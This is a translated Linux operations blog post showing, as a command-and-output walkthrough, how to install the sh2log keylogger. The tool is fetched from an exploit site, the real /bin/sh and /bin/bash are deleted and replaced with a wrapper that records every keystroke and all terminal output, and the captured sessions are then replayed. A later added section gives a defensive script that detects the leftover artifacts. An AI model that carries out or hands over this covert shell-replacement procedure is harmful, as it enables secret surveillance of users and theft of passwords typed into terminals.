[sh2log] Linux keylogger notes
2024-10-02 22:28:26 Server operations 主机评测网
It records not only keystrokes but also the output shown in the terminal.
[root@Centos log]# wget http://www.i0day.com/exp/Linux/sh2log-1.0.tgz
--2013-01-07 05:16:56--  http://www.i0day.com/exp/Linux/sh2log-1.0.tgz
Resolving packetstorm.foofus.com... 64.71.188.242
Connecting to packetstorm.foofus.com|64.71.188.242|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80240 (78K)
Saving to: `sh2log-1.0.tgz'
100%[=====================================================================================>] 80,240 57.2K/s in 1.4s
2013-01-07 05:16:58 (57.2 KB/s) - `sh2log-1.0.tgz' saved [80240/80240]
[root@Centos log]# tar xf sh2log-1.0.tgz
[root@Centos log]# cd sh2log-1.0
[root@Centos sh2log-1.0]#
Build options
[root@Centos sh2log-1.0]# make
Please specify the target:
make linux
make freebsd
make openbsd
make cygwin
make sunos
make irix
make hpux
make aix
make osf
As follows:
[root@Centos sh2log-1.0]# make linux
gcc -g -W -Wall -o sh2log rc4.c sha1.c sh2log.c -lutil -DLINUX
gcc -g -W -Wall -o sh2logd rc4.c sha1.c sh2logd.c
gcc -g -W -Wall -o parser rc4.c sha1.c parser.c -lX11 -L/usr/X11R6/lib
parser.c:35:22: error: X11/Xlib.h: No such file or directory
parser.c: In function ‘main’:
parser.c:291: error: ‘Display’ undeclared (first use in this function)
parser.c:291: error: (Each undeclared identifier is reported only once
parser.c:291: error: for each function it appears in.)
parser.c:291: error: ‘dpi’ undeclared (first use in this function)
parser.c:292: error: ‘Window’ undeclared (first use in this function)
parser.c:292: error: expected ‘;’ before ‘wnd’
parser.c:293: error: ‘XWindowAttributes’ undeclared (first use in this function)
parser.c:293: error: expected ‘;’ before ‘xwa’
parser.c:515: warning: implicit declaration of function ‘XOpenDisplay’
parser.c:522: error: ‘wnd’ undeclared (first use in this function)
parser.c:524: warning: implicit declaration of function ‘XSetWindowBorderWidth’
parser.c:525: warning: implicit declaration of function ‘XSync’
parser.c:525: error: ‘False’ undeclared (first use in this function)
parser.c:526: warning: implicit declaration of function ‘XGetWindowAttributes’
parser.c:526: error: ‘xwa’ undeclared (first use in this function)
parser.c:714: warning: implicit declaration of function ‘XMoveResizeWindow’
parser.c:772: warning: implicit declaration of function ‘XCloseDisplay’
make: *** [linux] Error 1
The error:
parser.c:35:22: error: X11/Xlib.h: No such file or directory
The parser is linked against X11, so install the X11 development headers:
[root@Centos sh2log-1.0]# yum install libX11-devel
Compile again:
[root@Centos sh2log-1.0]# make linux
gcc -g -W -Wall -o sh2log rc4.c sha1.c sh2log.c -lutil -DLINUX
gcc -g -W -Wall -o sh2logd rc4.c sha1.c sh2logd.c
gcc -g -W -Wall -o parser rc4.c sha1.c parser.c -lX11 -L/usr/X11R6/lib
First delete the demo recording shipped with the source:
[root@Centos sh2log-1.0]# rm test.bin
Configuration:
[root@Centos sh2log-1.0]# mkdir /bin/shells/
[root@Centos sh2log-1.0]# cp -p /bin/sh /bin/shells/
[root@Centos sh2log-1.0]# cp -p /bin/bash /bin/shells/
[root@Centos sh2log-1.0]# rm -rf /bin/sh /bin/bash
[root@Centos sh2log-1.0]# cp -p sh2log /bin/sh
[root@Centos sh2log-1.0]# cp -p sh2log /bin/bash
[root@Centos sh2log-1.0]# ./sh2logd
[root@Centos sh2log-1.0]# ps -ef | grep sh2logd
root 27151 1 0 05:24 ? 00:00:00 ./sh2logd
root 27175 26396 0 05:24 pts/3 00:00:00 grep sh2logd
[root@Centos sh2log-1.0]#
sh2logd is now running, and a .bin file named after the current timestamp has been created in the working directory:
-rw------- 1 root root 0 Jan 7 05:24 sh2log-20130107-052402.bin
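The steps above leave three concrete artifacts on the host: the original shells parked in /bin/shells/, /bin/sh and /bin/bash replaced by byte-identical copies of the sh2log wrapper (on a stock system /bin/sh is a symlink, not a regular file), and sh2logd writing sh2log-YYYYMMDD-HHMMSS.bin recordings into its working directory. The script below is an added detection example written for these notes; it is not part of sh2log. It takes a filesystem root as its first argument (an assumption made so it can be run against a mounted image or a constructed test tree as well as the live system, where the argument is simply /), reports findings on stderr and prints the number of findings on stdout.

```shell
#!/bin/sh
# Added detection example for the sh2log install steps; not part of sh2log.
# ROOT (first argument) is the filesystem root to inspect; default is /.
# Findings go to stderr, the number of findings to stdout.

check_sh2log_artifacts() {
    root="${1:-}"
    hits=0

    # 1. The install steps move the real shells into /bin/shells/.
    if [ -d "$root/bin/shells" ]; then
        echo "ARTIFACT: $root/bin/shells/ exists (original shells moved aside)" >&2
        hits=$((hits + 1))
    fi

    # 2. /bin/sh and /bin/bash were both copied from the same sh2log binary.
    #    On a stock system /bin/sh is a symlink (to bash or dash), never a
    #    regular file that is byte-identical to /bin/bash.
    if [ -f "$root/bin/sh" ] && [ ! -L "$root/bin/sh" ] && \
       [ -f "$root/bin/bash" ] && cmp -s "$root/bin/sh" "$root/bin/bash"; then
        echo "ARTIFACT: $root/bin/sh is a regular file identical to $root/bin/bash" >&2
        hits=$((hits + 1))
    fi

    # 3. sh2logd names its session recordings sh2log-YYYYMMDD-HHMMSS.bin and
    #    writes them into its working directory; search the whole tree.
    recordings=$(find "$root/" -name 'sh2log-[0-9]*-[0-9]*.bin' 2>/dev/null | wc -l | tr -d ' ')
    if [ "$recordings" -gt 0 ]; then
        echo "ARTIFACT: $recordings sh2log session recording(s) found under $root/" >&2
        hits=$((hits + 1))
    fi

    echo "$hits"
}

# The daemon appears in the process list as sh2logd. This only means
# something on the live system, so it is kept apart from the file checks.
# Prints the number of matching processes.
check_sh2log_process() {
    ps -eo comm= 2>/dev/null | grep -c -x 'sh2logd' || true
}

# Usage on a live host (guarded so that sourcing the file runs nothing):
#   RUN_SH2LOG_CHECK=1 sh detect_sh2log.sh /
if [ "${RUN_SH2LOG_CHECK:-0}" = "1" ]; then
    files=$(check_sh2log_artifacts "${1:-/}")
    procs=$(check_sh2log_process)
    echo "file artifacts: $files, sh2logd processes: $procs"
fi
```

On an RPM-based host such as the CentOS box in these notes, `rpm -V bash` is a useful complement: it compares /bin/bash on disk against the package database and flags the size and digest mismatch that the replaced binary produces.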
Viewing the recordings
First open a terminal and run a few commands:
[root@Centos log]# bash
[root@Centos log]# ls -la
total 112
drwxr-xr-x 3 root root 4096 Jan 7 05:17 .
drwxrwxrwt 17 root root 4096 Jan 7 05:18 ..
drwxr-xr-x 2 root root 4096 Jan 7 05:24 sh2log-1.0
-rw-r--r-- 1 root root 80240 Nov 8 2006 sh2log-1.0.tgz
[root@Centos log]# pwd
/tmp/log
[root@Centos log]#
Then read the log back with the parser:
[root@Centos sh2log-1.0]# ./parser sh2log-20130107-052402.bin
SID SOURCE IP UID PID START DATE END DATE DURATION
1 [127.0.0.1] 0 (27293) 07/01 05:25 | 07/01 05:25 X 03s
2 [127.0.0.1] 0 (27407) 07/01 05:26 | 07/01 05:26 X 02s
In interactive mode, use Enter to fast forward, Space to pause and q to quit.
Note that xterm is required for window resizing.
Session ID -> 2
Interactive mode (y/n) ? n
07/01 05:26:53 -> ls -la
07/01 05:26:53 -> pwd